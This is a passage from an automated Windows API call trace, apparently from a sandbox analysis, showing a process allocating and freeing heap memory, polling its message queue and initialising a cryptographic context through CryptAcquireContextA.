HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0230.799] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0230.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0230.799] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0230.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0230.799] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0230.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0230.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0230.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0230.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0230.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0230.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0230.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0230.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0230.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0230.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9b8 [0230.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0230.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0230.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0230.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8c8 [0230.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0230.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0230.799] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0230.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0230.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.800] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0230.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0230.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8c8 | out: hHeap=0x970000) returned 1 [0230.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0230.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9b8 | out: hHeap=0x970000) returned 1 [0230.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0230.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0230.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0230.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0230.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0230.800] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0230.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0230.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0230.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0230.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0230.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9b8 [0230.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0230.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0230.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0230.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0230.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0230.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0230.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0230.801] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0230.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0230.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0230.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8c8 [0230.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0230.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0230.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0230.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0230.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0230.801] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.801] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0230.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0230.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0230.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0230.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0230.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0230.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0230.803] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.803] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0230.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0230.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0230.812] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0230.812] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0230.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0230.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0230.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0230.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0230.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0230.813] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0230.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0230.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0230.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0230.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0230.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0230.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0230.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0230.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e699a8 [0230.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e699a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0230.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0230.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0230.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0230.814] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0230.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0230.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0230.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0230.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0230.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0230.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0230.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0230.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0230.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0230.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0230.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0230.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0230.814] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0230.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0230.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0230.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0230.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0230.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0230.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0230.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0230.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0230.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0230.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0230.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0230.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0230.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0230.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0230.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0230.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0230.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0230.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0230.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0230.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0230.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0230.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0230.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0230.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0230.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0230.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0230.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0230.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0230.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0230.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0230.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0230.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0230.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0230.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0230.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0230.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0230.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0230.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0230.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0230.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0230.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0230.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0230.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0230.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0230.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0230.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0230.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8c8 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0230.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0230.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0230.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0230.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0230.819] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0230.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0230.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0230.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0230.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0230.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0230.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0230.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0230.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0230.819] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0230.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0230.819] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0230.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0230.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0230.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54db8 [0230.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0230.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0230.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0230.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0230.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0230.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0230.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8c8 [0230.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0230.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0230.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0230.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0230.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0230.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0230.820] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0230.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0230.820] 